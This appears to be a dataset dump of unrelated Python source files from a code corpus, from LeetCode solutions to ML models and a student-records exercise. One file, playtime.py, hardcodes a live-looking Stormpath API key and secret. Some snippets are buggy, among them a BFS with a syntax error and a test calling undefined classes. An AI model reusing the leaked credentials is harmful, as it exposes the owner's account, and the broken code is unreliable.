4.\n\n\nConstraints:\n\nn == grid.length\nn == grid[i].length\n1 <= n <= 100\ngrid[i][j] is 0 or 1\n\n\n\n\"\"\"\n\n\nclass MaxDistance:\n\n def doit_bfs(self, grid: list) -> int:\n from collections import deque\n q = deque([])\n m, n = len(grid), len(grid[0])\n\n for i in range(m):\n for j in range(n):\n if grid[i][j] == 1:\n q.append((i, j))\n\n if len(q) == 0 or len(q) == m * n:\n return 0\n\n d = -1\n while q:\n size = len(q)\n for c in range(size):\n i, j = q.popleft()\n for x, y in ((i-1, j), (i, j+1), (i + 1, j), (i. i-1)):\n if 0 <= x < n and 0 <= y <= n and grid[x][y] == 0:\n grid[x][y] = 1\n q.append((x, y))\n d += 1\n\n return d\n\n def doit_bfs_1(self, grid: list) -> int:\n q, vis = [], set()\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n q.append((i, j, 0))\n vis.add((i, j))\n\n if len(q) == 0 or len(q) == len(grid) * len(grid[0]): return -1\n ans = 0\n while q:\n i, j, d = q.pop(0)\n for x, y in [(i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1)]:\n if 0 <= x < len(grid) and 0 <= y < len(grid[0]):\n if (x, y) not in vis:\n vis.add((x, y))\n ans = max(ans, d + 1)\n q.append((x, y, d + 1))\n\n return ans","sub_path":"PythonLeetcode/leetcodeM/1162_AsFarFromLandAsPossible.py","file_name":"1162_AsFarFromLandAsPossible.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"470430075","text":"from stormpath.client import Client as StormpathClient\n\nSTORMPATH_API_KEY_ID=\"4FESWTU76DNA7UVHUCNJ6E0AB\"\nSTORMPATH_API_KEY_SECRET=\"dx5/ABWKvnjxMM5nEMwNLyCc90y0wwUXfNsKWBJWaJ4\"\nSTORMPATH_APPLICATION_NAME=\"Daily Idea\"\n\nstormpath_client = StormpathClient(\n api_key_id=STORMPATH_API_KEY_ID,\n api_key_secret=STORMPATH_API_KEY_SECRET)\nstormpath_application = stormpath_client.applications.search(STORMPATH_APPLICATION_NAME)[0]\n\n","sub_path":"playtime.py","file_name":"playtime.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109354341","text":"import ROOT\nROOT.gSystem.Load(\"libHiggsAnalysisCombinedLimit\")\nimport json\n\n\nclass XZZDataCardMaker:\n def __init__(self,finalstate,category,luminosity=1.0,physics=\"LJ\"):\n self.physics=physics\n self.finalstate=finalstate\n self.category=category\n self.contributions=[]\n self.systematics=[]\n self.observation=0.0\n\n self.tag=self.physics+\"_\"+finalstate+\"_\"+category\n self.luminosity=luminosity\n\n\n def addSystematic(self,name,kind,values,addPar = \"\"):\n self.systematics.append({'name':name,'kind':kind,'values':values })\n\n def addObservation(self,observation=0):\n self.observation=observation\n\n def addContribution(self,name,ID,rate):\n self.contributions.append({'name':name,'ID':ID,'rate':rate}) \n\n def makeCard(self):\n\n f = open(self.tag+'.txt','w')\n f.write('imax 1\\n')\n f.write('jmax {n}\\n'.format(n=len(self.contributions)-1))\n f.write('kmax *\\n')\n f.write('-------------------------\\n')\n f.write('bin '+self.tag+'\\n')\n f.write('observation '+str(self.observation)+'\\n')\n f.write('-------------------------\\n')\n\n # sorted contributions\n contributions = sorted(self.contributions,key=lambda x: x['ID'])\n \n # print bin\n f.write('bin\\t') \n for contrib in contributions:\n f.write(self.tag+'\\t')\n f.write('\\n')\n\n #print names\n f.write('process\\t')\n for contrib in contributions:\n f.write(contrib['name']+'\\t')\n f.write('\\n')\n \n #print IDs\n f.write('process\\t')\n for contrib in contributions:\n f.write(str(contrib['ID'])+'\\t')\n f.write('\\n')\n \n #print rate\n f.write('rate\\t')\n for contrib in contributions:\n f.write(str(contrib['rate'])+'\\t')\n f.write('\\n')\n\n f.write('-------------------------\\n')\n\n # print systematics\n for syst in self.systematics:\n if syst['kind'] == 'param':\n f.write(syst['name']+'\\t'+'param\\t' +str(syst['values'][0])+'\\t'+str(syst['values'][1])+'\\n')\n elif syst['kind'] == 'lnN': \n f.write(syst['name']+'\\t'+ 'lnN\\t' )\n for contrib in contributions:\n has=False\n for name,v in syst['values'].iteritems():\n if contrib['name']==name:\n f.write(str(v)+'\\t' )\n has=True\n break;\n if not has:\n f.write('-\\t' )\n f.write('\\n' )\n \n \n f.close()\n\n\n \n\n","sub_path":"XZZ2l2nu/python/statistics/XZZDataCardMaker.py","file_name":"XZZDataCardMaker.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"62887066","text":"#!/usr/bin/env python\nimport subprocess\n\nimport rospy\nfrom std_msgs.msg import String\n\n\ndef cb(msg: String):\n args = [\"espeak\", msg.data]\n subprocess.run(args)\n\n\ndef main():\n rospy.init_node(\"tts_node\")\n sub = rospy.Subscriber(\"speak\", String, cb)\n rospy.spin()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/tts_node.py","file_name":"tts_node.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"112304685","text":"'''\nProblem Statement\nGiven a sorted array arr[] of distinct integers. Sort the array into a wave-like array and return it.\nIn other words, arrange the elements into a sequence such that a1 >= a2 <= a3 >= a4 <= a5.....\n(considering the increasing lexicographical order).\n\nInput Format\n\nFirst line of input contains n-the size of array. Next line of input contains n integers-the\nelements of array.\n\nConstraints\n\n1 ≤ n ≤ 10^6\n0 ≤ Ai ≤10^7\n\nOutput Format\n\nPrint the array which should be sorted in wave like pattern.\n'''\n\nn=int(input())\narr = list(set(map(int,input().split())))\nfor i in range(0,n-1,2):\n arr[i], arr[i+1] = arr[i+1], arr[i]\nprint(*arr)\n","sub_path":"WaveFormArray.py","file_name":"WaveFormArray.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"426874937","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 8 10:37:34 2019\r\n\r\n@author: Vik Jakkula\r\n\"\"\"\r\n\r\nimport torch \r\nfrom torch.autograd import Variable\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\n\r\nx = Variable(torch.Tensor([[1],[2],[3],[4]]))\r\ny = Variable(torch.Tensor([[2],[4],[6],[8]]))\r\n\r\nprint(x)\r\n\r\nclass LinearRegressionModel(nn.Module):\r\n def __init__(self,input_size,output_size):\r\n super(LinearRegressionModel,self).__init__()\r\n self.linear = nn.Linear(input_size,output_size)\r\n \r\n def forward(self,x):\r\n y_predict = self.linear(x)\r\n return y_predict\r\n \r\nmodel = LinearRegressionModel(1,1)\r\ncriteria = nn.MSELoss()\r\n# 0.01 is learning rate\r\noptimizer = optim.SGD(model.parameters(),0.01)\r\n\r\nfor epoch in range(500):\r\n y_predict = model(x)\r\n loss = criteria(y_predict,y)\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n print(epoch, float(loss.data[0]))\r\n\r\n\r\ntest = Variable(torch.Tensor([20]))\r\nz = model.forward(test)\r\nprint(float(z[0]))\r\n\r\n\r\n","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"66903006","text":"#!/usr/bin/env python3\nimport os\nimport sys\n\nsys.path.append(os.path.dirname(__file__)+\"/../../../\")\n\ndef main():\n os.environ['MODE']='develop'\n from nwpc_monitor_task_scheduler.celery_server.task import sms\n\n result = sms.get_group_sms_status_task.delay()\n # result = tasks.update_dingtalk_token_task.delay()\n\n print(result)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"test/manual/nwpc_monitor_task_scheduler/run_tasks.py","file_name":"run_tasks.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"621750777","text":"import os\n\nOUTFILENAME = \"output.txt\"\n\nfiles = [f for f in os.listdir(\".\") if os.path.isfile(f) and f != os.path.basename(__file__) and f != OUTFILENAME]\n\nstrings = []\n\nfor f in files:\n\twith open(f) as infile:\n\t\tstrings.append(infile.read())\n\nwith open(\"output.txt\", \"w\") as outfile:\n\toutfile.write(\"\\n\\n\".join(strings))\n","sub_path":"concat.py","file_name":"concat.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"104468538","text":"import sys\n#print(sys.path)\nimport os\n#获取项目路径下的目录\nos.chdir('D:\\\\Test_framework-master')\n#打印出项目路径下的目录\n#for file in os.listdir(os.getcwd()):\n# print(file)\nsys.path.append('D:\\\\Test_framework-master')\n\nimport time\nimport unittest\nfrom srcut.config import Config, DATA_PATH, REPORT_PATH\nfrom srcut.log import logger\nfrom srcut.file_reader import ExcelReader\nfrom srcut.HTMLTestRunner import HTMLTestRunner\n#from srcut.test_youj import Email\nfrom test.page.xm_home_page import XmHomePage\n\nclass TestXm(unittest.TestCase):\n URL = Config().get('URL')\n excel = DATA_PATH + '/test.xlsx'\n\n def sub_setUp(self):\n # 初始页面是main page,传入浏览器类型打开浏览器\n self.page = XmHomePage(browser_type='chrome').get(self.URL, maximize_window=False)\n\n def sub_tearDown(self):\n self.page.quit()\n\n def test_login(self):\n datas = ExcelReader(self.excel).data\n for d in datas:\n with self.subTest(data=d):\n self.sub_setUp()\n self.page.search(d['xxxx'])\n time.sleep(2)\n self.page = XmLoginPage(self.page) # 页面跳转到result page\n links = self.page.result_links\n for link in links:\n logger.info(link.text)\n self.sub_tearDown()\n\n\nif __name__ == '__main__':\n report = REPORT_PATH + '\\\\report.html'\n with open(report, 'wb') as f:\n runner = HTMLTestRunner(f, verbosity=2, title='测试网 mcf', description='修改html报告')\n runner.run(TestBaiDu('test_search'))\n # e = Email(title='测试网测试报告',\n # message='这是今天的测试报告,请查收!',\n # receiver='422703409@qq.com',\n # server='...',\n # sender='...',\n # password='...',\n # path=report\n # )\n # e.send()\n","sub_path":"test/case/test_baidu_6.py","file_name":"test_baidu_6.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"479387535","text":"import pickle\nfrom openke.utils import DeepDict\nfrom subgraphs import read_triples\n\nclass DynamicTopk:\n def __init__(self, default=10):\n self.topk_dict_head = DeepDict()\n self.topk_dict_tail = DeepDict()\n self.default_topk = default\n\n def get_dyn_topk(self, ent, rel, type_prediction):\n if type_prediction == \"head\":\n if (ent, rel) in self.topk_dict_head:\n return self.topk_dict_head[(ent, rel)]\n else:\n return self.default_topk\n elif type_prediction == \"tail\":\n if (ent, rel) in self.topk_dict_tail:\n return self.topk_dict_tail[(ent, rel)]\n else:\n return self.default_topk\n\n def populate(self, triples_file):\n triples = read_triples(triples_file)\n for triple in triples:\n if (triple[0], triple[2]) in self.topk_dict_tail:\n self.topk_dict_tail[(triple[0],triple[2])] += 1\n else:\n self.topk_dict_tail[(triple[0],triple[2])] = 1\n\n if (triple[1], triple[2]) in self.topk_dict_head:\n self.topk_dict_head[(triple[1], triple[2])] += 1\n else:\n self.topk_dict_head[(triple[1], triple[2])] = 1\n\n def load(self, dyn_topk_head_filename, dyn_topk_tail_filename):\n with open(dyn_topk_tail_filename, 'rb') as fin:\n self.topk_dict_tail = pickle.load(fin)\n\n with open(dyn_topk_head_filename, 'rb') as fin:\n self.topk_dict_head = pickle.load(fin)\n\n def save(self, dyn_topk_head_filename, dyn_topk_tail_filename):\n with open(dyn_topk_tail_filename, 'wb') as fout:\n pickle.dump(self.topk_dict_tail, fout, protocol = pickle.HIGHEST_PROTOCOL)\n\n with open(dyn_topk_head_filename, 'wb') as fout:\n pickle.dump(self.topk_dict_head, fout, protocol = pickle.HIGHEST_PROTOCOL)\n","sub_path":"dynamic_topk.py","file_name":"dynamic_topk.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"645019783","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\n\nfrom swagger_server import util\nfrom swagger_server.models.base_model_ import Model\n\n\nclass SecurityMixin(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n \n def __init__(self, identifier: str = None, securitykey: str = None, ip: str = None): # noqa: E501\n \"\"\"SecurityMixin - a model defined in Swagger\n\n :param identifier: The identifier of this SecurityMixin. # noqa: E501\n :type identifier: str\n :param securitykey: The securitykey of this SecurityMixin. # noqa: E501\n :type securitykey: str\n :param ip: The ip of this SecurityMixin. # noqa: E501\n :type ip: str\n \"\"\"\n self.swagger_types = {\n 'identifier': str,\n 'securitykey': str,\n 'ip': str\n }\n \n self.attribute_map = {\n 'identifier': 'identifier',\n 'securitykey': 'securitykey',\n 'ip': 'ip'\n }\n self._identifier = identifier\n self._securitykey = securitykey\n self._ip = ip\n \n @classmethod\n def from_dict(cls, dikt) -> 'SecurityMixin':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The SecurityMixin of this SecurityMixin. # noqa: E501\n :rtype: SecurityMixin\n \"\"\"\n return util.deserialize_model(dikt, cls)\n \n @property\n def identifier(self) -> str:\n \"\"\"Gets the identifier of this SecurityMixin.\n\n [] # noqa: E501\n\n :return: The identifier of this SecurityMixin.\n :rtype: str\n \"\"\"\n return self._identifier\n \n @identifier.setter\n def identifier(self, identifier: str):\n \"\"\"Sets the identifier of this SecurityMixin.\n\n [] # noqa: E501\n\n :param identifier: The identifier of this SecurityMixin.\n :type identifier: str\n \"\"\"\n if identifier is None:\n raise ValueError(\"Invalid value for `identifier`, must not be `None`\") # noqa: E501\n \n self._identifier = identifier\n \n @property\n def securitykey(self) -> str:\n \"\"\"Gets the securitykey of this SecurityMixin.\n\n [] # noqa: E501\n\n :return: The securitykey of this SecurityMixin.\n :rtype: str\n \"\"\"\n return self._securitykey\n \n @securitykey.setter\n def securitykey(self, securitykey: str):\n \"\"\"Sets the securitykey of this SecurityMixin.\n\n [] # noqa: E501\n\n :param securitykey: The securitykey of this SecurityMixin.\n :type securitykey: str\n \"\"\"\n if securitykey is None:\n raise ValueError(\"Invalid value for `securitykey`, must not be `None`\") # noqa: E501\n \n self._securitykey = securitykey\n \n @property\n def ip(self) -> str:\n \"\"\"Gets the ip of this SecurityMixin.\n\n [] # noqa: E501\n\n :return: The ip of this SecurityMixin.\n :rtype: str\n \"\"\"\n return self._ip\n \n @ip.setter\n def ip(self, ip: str):\n \"\"\"Sets the ip of this SecurityMixin.\n\n [] # noqa: E501\n\n :param ip: The ip of this SecurityMixin.\n :type ip: str\n \"\"\"\n if ip is None:\n raise ValueError(\"Invalid value for `ip`, must not be `None`\") # noqa: E501\n \n self._ip = ip\n","sub_path":"kms_api/swagger_server/models/security_mixin.py","file_name":"security_mixin.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"467580111","text":"import cv2\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, Flatten, MaxPooling2D, BatchNormalization, LSTM, TimeDistributed\nfrom keras import optimizers\nfrom keras.preprocessing.sequence import pad_sequences\nfrom sklearn import preprocessing\nfrom keras.utils import to_categorical\nfrom sklearn.model_selection import train_test_split\n\nmodel = Sequential()\n\n\ndef training_model(X_input, Y_output, num_of_classes, one_hot_encoder, le):\n global model\n in_shape = X_input[0].shape\n\n # conv 1\n model.add(Conv2D(32, kernel_size=3, input_shape=in_shape, strides=(1, 1), activation='relu', padding='same', name=\"c1\"))\n model.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2)))\n model.add(BatchNormalization())\n\n # conv 2\n model.add(Conv2D(64, kernel_size=3, strides=(2, 2), activation='relu', padding='same', name=\"c2\"))\n model.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2)))\n model.add(BatchNormalization())\n\n # conv 3\n model.add(Conv2D(96, kernel_size=3, strides=(1, 1), activation='relu', padding='same', name=\"c3\"))\n # //mai\n model.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2)))\n model.add(BatchNormalization())\n # //\n # conv 4\n # model.add(Conv2D(512, kernel_size=3, strides=(1, 1), activation='relu', padding='same', name=\"c4\"))\n #\n # # conv 5\n # model.add(Conv2D(512, kernel_size=3, strides=(1, 1), activation='relu', padding='same', name=\"c5\"))\n # model.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2)))\n\n # FC6\n model.add(TimeDistributed(Flatten()))\n model.add(Dense(256))\n\n # add LSTM\n model.add(LSTM(256, return_sequences=True))\n model.add(LSTM(256, return_sequences=True))\n model.add(Flatten())\n\n # model.add((Dense(128, activation='relu')))\n model.add((Dense(num_of_classes, activation='softmax')))\n print(model.summary())\n\n sgd = optimizers.SGD(lr=0.1)\n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy']) # lsa hshof loss eh\n\n x_train, x_test, y_train, y_test = train_test_split(X_input, Y_output, test_size=0.2, random_state=0, shuffle=True)\n\n model.fit(x_train, y_train, epochs=50, batch_size=in_shape[0], shuffle=True, verbose=2,\n validation_data=(x_test, y_test))\n\n # result = model.evaluate(x_test, y_test, verbose=2)\n # print(\"Done testing\")\n\n # print(\"Test loss =\", result[0])\n # print(\"Test accuracy evaluation=\", result * 100)\n model.save_weights(\"wild_model_weights.h5\")\n\n prediction = model.predict(x_test)\n print(\"Predicting x_test:\")\n inverse_prediction = one_hot_encoder.inverse_transform(prediction.reshape(-1, num_of_classes))\n inverse_prediction = le.inverse_transform(inverse_prediction.astype(int)) # de kalmaat\n inverse_ytest = one_hot_encoder.inverse_transform(y_test.reshape(-1, num_of_classes))\n inverse_ytest = le.inverse_transform(inverse_ytest.astype(int))\n\n correct = 0\n total = 0\n for i in range(y_test.shape[0]):\n total += 1\n if inverse_prediction[i] == inverse_ytest[i]:\n correct += 1\n print(inverse_prediction[i], \"****************\", inverse_ytest[i])\n\n print(\"#correct:\", correct)\n print(\"total\", total)\n print(\"Wild model overall accuracy\", (correct / len(inverse_ytest)) * 100, \"%\")\n\n\ndef testing(padded_total_words_test, y_labels_test_encoded, one_hot_encoder, le, num_of_classes):\n global model\n prediction = model.predict(padded_total_words_test)\n\n print(\"Predicting One video:\")\n inverse_prediction = one_hot_encoder.inverse_transform(prediction.reshape(-1, num_of_classes))\n inverse_prediction = le.inverse_transform(inverse_prediction.astype(int))\n inverse_ytest = one_hot_encoder.inverse_transform(y_labels_test_encoded.reshape(-1, num_of_classes))\n inverse_ytest = le.inverse_transform(inverse_ytest.astype(int))\n correct = 0\n for i in range(y_labels_test_encoded.shape[0]):\n if inverse_prediction[i] == inverse_ytest[i]:\n correct += 1\n print(inverse_prediction[i], \"##################\", inverse_ytest[i])\n print(\"correct\", correct)\n print(\"total\", len(inverse_ytest))\n print(\"one video test Accuracy\", (correct / len(inverse_ytest)) * 100, \"%\")\n","sub_path":"wild_model.py","file_name":"wild_model.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"452628898","text":"from student import Student\nfrom fag import Fag\n\nclass Studentsystem:\n def __init__(self):\n self._studentListe = []\n self._fagListe = []\n\n# Oppgave 1\n def lesFraFil(self, filnavn):\n fil = open(filnavn)\n\n # *MAT1001\n for linje in fil:\n if linje[0] == \"*\":\n fag = Fag(linje[1:-1])\n self._fagListe.append(fag)\n else:\n student = finnStudent(linje[:-1])\n\n if student == None:\n student = Student(linje[:-1])\n self._studentListe.append(student)\n\n\n fag.leggTilStudent(student)\n student.leggTilFag(fag)\n\n\n def finnStudent(self, navn):\n student = None\n for stud in self._studentListe:\n if stud.hentStudentNavn() == navn:\n student = stud\n\n return student\n\n\n def finnFag(self, emnekode):\n fag = None\n\n for f in self._fagListe:\n if f.hentFagNavn() == emnekode:\n fag = f\n\n return fag\n\n\n\n# Oppgave 2\n def skrivStudent(self):\n navn = input(\"Oppgi navnet til person du vil hente oversikt til\\n\")\n\n student = finnStudent(navn)\n\n if student == None:\n print(navn + \" finnes ikke i systemet\")\n else:\n student.skrivFagPaaStudent()\n\n\n def skrivFag(self):\n kode = input(\"Oppgi emne til faget du vil hente oversikt til\\n\")\n\n fag = finnFag(kode)\n\n if fag == None:\n print(kode + \" finnes ikke i systemet\")\n\n def hentStudentMedFlestFag(self):\n studentMedFlest = None\n antallFlest = 0\n\n for stud in self._studentListe:\n if stud.hentAntallFag() > antallFlest:\n antallFlest = stud.hentAntallFag()\n studentMedFlest = stud\n\n print(\"Student med flest fag: \" + studentMedFlest.hentStudentNavn()\n + \" med antall: \" + antallFlest)\n\n\n def hentFagMedFlestStudenter(self):\n fag = None\n antallFlest = 0\n\n for f in self._fagListe:\n if (f.hentAntallStudent() > antallFlest):\n fag = f\n antallFlest = f.hentAntallStudent()\n\n print(\"Fag med flest studenter: \" + fag.hentFagNavn()\n + \" med antall: \" + antallFlest)\n\n\n# Oppgave 3\n def settInnStudent(self, navn):\n\n student = finnStudent(navn)\n\n if (student == None):\n self._studentListe.append(student)\n print(navn + \" lagt til\")\n\n else:\n print(navn + \" finnes allerede.\")\n\n\n def settInnFag(self, navn):\n fag = finnFag(navn)\n\n if (fag == None):\n self._fagListe.append(fag)\n print(navn + \" lagt til\")\n else:\n print(navn + \" finnes allerede.\")\n\n\n\n# Oppgave 4\n def leggTilStudentIFag(self):\n navn = input(\"Hva heter studenten du vil legge til i faget.\\n\")\n\n student = finnStudent(navn)\n\n if student == None:\n print(navn + \" finnes ikke i systemet, du må legge studenten inn i systemet først.\")\n return\n\n kode = inpurt(\"Hva heter emnet du vil legget til \" + navn + \"i\\n\")\n\n fag = finnFag(kode)\n\n if fag == None:\n print(kode + \" finnes ikke i systemet, du må legge faget inn i systemet først.\")\n return\n\n\n if student.tarFag(fag):\n print(navn + \" tar allerede faget.\")\n\n else:\n student.leggTilFag(fag)\n fag.leggTilStudent(student)\n print(navn + \" er lagt til i \" + kode)\n\n\n\n def ordrelokke(self):\n inntast = \"\"\n while inntast != \"q\":\n self.skrivMeny()\n inntast = input(\"Skriv inn ditt valg: \")\n\n if inntast == \"1\":\n self.leggTilStudent()\n elif inntast == \"2\":\n self.leggTilFag()\n elif inntast == \"3\":\n self.leggTilStudentIFag()\n elif inntast == \"4\":\n self.skrivFag()\n elif inntast == \"5\":\n self.skrivStudent()\n elif inntast == \"6\":\n self.finnFagMedFlestStudenter()\n elif inntast == \"7\":\n self.finnStudentMedFlestFag()\n #elif inntast == \"8\":\n #self.fjernStudentFraFag()\n #elif inntast == \"9\":\n #self.skrivAlt()\n elif inntast != \"q\":\n print(\"Ugylig input.\\n\")\n\n print(\"Avslutter programmet\")\n\n def skrivMeny(self):\n print(\"--Meny--\")\n print(\"1 - Legg til ny student\")\n print(\"2 - Legg til nytt fag\")\n print(\"3 - Legg til student i fag\")\n print(\"4 - Skriv ut studenter ved fag\")\n print(\"5 - Skriv ut alle fag til student\")\n print(\"6 - Finn fag som blir tatt av flest\")\n print(\"7 - Finn student som tar flest fag\")\n #print(\"8 - Fjern student fra fag\")\n #print(\"9 - Fullstendig oversikt\")\n print(\"q - Avslutt\")\n\n #HVIS TID: 9 - fullstendig oversikt\n def skrivAlt(self):\n for fag in self._alleFag:\n fag.skrivStudenterVedFag()\n\n #HVIS TID:\n #11-7\n def fjernStudentFraFag(self):\n navn = input(\"Hva heter studenten du vil fjerne fra faget?\")\n stud = self.finnStudent(navn)\n if stud == None:\n print(navn + \" finnes ikke.\")\n return\n\n fagNavn = input(\"Fra hvilket fag vil du fjerne \" + navn +\"?\")\n fag = self.finnFag(fagNavn)\n if fag == None:\n print(fagNavn + \" finnes ikke.\")\n return\n\n #sjekker om studenten tar faget, hvis den ikke tar det gjoer vi ikke noe.\n if not stud.tarFag(fag):\n print(navn + \" tar ikke \" + fagNavn)\n else:\n #hvis studenten finnes, faget finnes, og studenten faktisk tar faget, saa kan vi fjerne den!\n stud.fjernFag(fag)\n fag.fjernStudent(stud)\n\n print(navn + \" fjernet fra \" + fagNavn)\n","sub_path":"uke10/studentsystem.py","file_name":"studentsystem.py","file_ext":"py","file_size_in_byte":5997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"390944568","text":"import numpy as np\nfrom abc import ABC, abstractmethod\nfrom skimage.draw import circle, rectangle\n\n\ndef circular_mask(shape):\n mask = np.zeros(shape, dtype=np.uint8)\n rr, cc = circle(shape[0]/2, shape[1]/2, radius=shape[0] / 3, shape=shape)\n mask[rr, cc] = 1\n \n return mask\n\n\ndef striped_mask(shape):\n mask = np.zeros(shape, dtype=np.uint8)\n mask[::2] = 1\n\n return mask\n\n\ndef concentric_rectangle_mask(shape, width):\n mask = np.ones(shape, dtype=np.uint8)\n rect = np.zeros(shape, dtype=np.uint8)\n\n for i in range(1, int(shape[0] / (2 * width)), 2):\n rect = np.zeros(shape, dtype=np.uint8)\n start = (i*width, i*width)\n end = (shape[0] - i*width, shape[1] - i*width)\n rr, cc = rectangle(start=start, end=end, shape=mask.shape)\n rect[rr, cc] = 1\n mask -= rect\n\n rect = np.zeros(shape, dtype=np.uint8)\n start = ((i+1) * width, (i+1) * width)\n end = (shape[0] - (i+1) * width, shape[1] - (i+1) * width)\n rr, cc = rectangle(start=start, end=end, shape=mask.shape)\n rect[rr, cc] = 1\n mask += rect\n\n\n return mask\n\n\nclass AbstractProcessing(ABC):\n \"\"\" Base class for post-processing. \"\"\"\n @abstractmethod\n def apply(self, *args, **kwargs):\n pass\n\n\nclass Quantize(AbstractProcessing):\n \"\"\" Apply quantization to each frame of a given 3D input. \"\"\"\n def __init__(self, bins=2):\n self.bins = bins\n\n def apply(self, images):\n w = images.max() / self.bins\n\n for i in range(images.shape[0]):\n images[i, :, :] -= (images[i, :, :] - (images[i, :, :] // w) * w).astype('uint8')\n\n return images\n\n\nclass AdjustBrightness(AbstractProcessing):\n \"\"\" Gamma < 1 will decrease brightness, Gamma > 1 will increase it. \"\"\"\n def __init__(self, gamma):\n self.gamma = gamma\n \n def apply(self, images):\n # Normalize, then apply brightness correction\n images = (images / images.max()) ** (1 / self.gamma)\n # Convert back to grayscale [0, 255]\n images = ((images - images.min()) * (1 / (images.max() - images.min()) * 255)).astype('uint8')\n\n return images\n\n\nclass Mask(AbstractProcessing):\n \"\"\" Apply a binary mask to each frame of a given 3D input. \"\"\"\n def __init__(self, mask):\n self.mask = mask\n \n def apply(self, images):\n images *= self.mask\n\n return images\n\n\nclass Border(AbstractProcessing):\n def __init__(self, margin, width):\n self.margin = margin\n self.width = width\n \n def apply(self, images):\n # White border\n images[:, self.margin:self.margin + self.width, :] = 255\n images[:, -self.margin - self.width:-self.margin, :] = 255\n images[:, :, self.margin:self.margin + self.width] = 255\n images[:, :, -self.margin - self.width:-self.margin] = 255\n \n # Black margin\n images[:, 0:self.margin, :] = 0\n images[:, -self.margin:, :] = 0\n images[:, :, 0:self.margin] = 0\n images[:, :, -self.margin:] = 0\n \n return images\n\n\nclass FromFunction(AbstractProcessing):\n \"\"\" Not tested, not fully compatible yet. \"\"\"\n def __init__(self, fn=None, *args, **kwargs):\n self.fn = fn\n self.args = args\n self.kwargs = kwargs\n \n def apply(self, images):\n for i in range(images.shape[0]):\n images[i, :, :] = self.fn(images[i, :, :], *self.args, **self.kwargs)\n\n return images\n\n\nclass Pipeline():\n \"\"\" Define an AbstractProcessing pipeline object. \"\"\"\n def __init__(self, *args):\n self._processing_list = args\n\n def run(self, images):\n if not self.is_empty():\n for f in self._processing_list:\n images = f.apply(images)\n\n return images\n \n def is_empty(self):\n return len(self._processing_list) == 0\n","sub_path":"postprocessing.py","file_name":"postprocessing.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"242046373","text":"import numpy as np\nimport numpy.linalg\nimport math\nimport time\nfrom utils.io import *\nfrom node import *\nfrom scipy.spatial.distance import euclidean\nfrom scipy.fftpack import fftn, ifftn, ifft\nfrom scipy.special import jv\nfrom new_hp import *\n\n\ngivals = [\n 22026.5, 20368, 18840.3, 17432.5, 16134.8, 14938.4, 13834.9, 12816.8,\n 11877.4, 11010.2, 10209.4, 9469.8, 8786.47, 8154.96, 7571.17, 7031.33,\n 6531.99, 6069.98, 5642.39, 5246.52, 4879.94, 4540.36, 4225.71, 3934.08,\n 3663.7, 3412.95, 3180.34, 2964.5, 2764.16, 2578.14, 2405.39, 2244.9,\n 2095.77, 1957.14, 1828.24, 1708.36, 1596.83, 1493.05, 1396.43, 1306.47,\n 1222.68, 1144.62, 1071.87, 1004.06, 940.819, 881.837, 826.806, 775.448,\n 727.504, 682.734, 640.916, 601.845, 565.329, 531.193, 499.271, 469.412,\n 441.474, 415.327, 390.848, 367.926, 346.454, 326.336, 307.481, 289.804,\n 273.227, 257.678, 243.089, 229.396, 216.541, 204.469, 193.129, 182.475,\n 172.461, 163.047, 154.195, 145.868, 138.033, 130.659, 123.717, 117.179,\n 111.022, 105.22, 99.7524, 94.5979, 89.7372, 85.1526, 80.827, 76.7447,\n 72.891, 69.2522, 65.8152, 62.5681, 59.4994, 56.5987, 53.856, 51.2619,\n 48.8078, 46.4854, 44.2872, 42.2059, 40.2348, 38.3676, 36.5982, 34.9212,\n 33.3313, 31.8236, 30.3934, 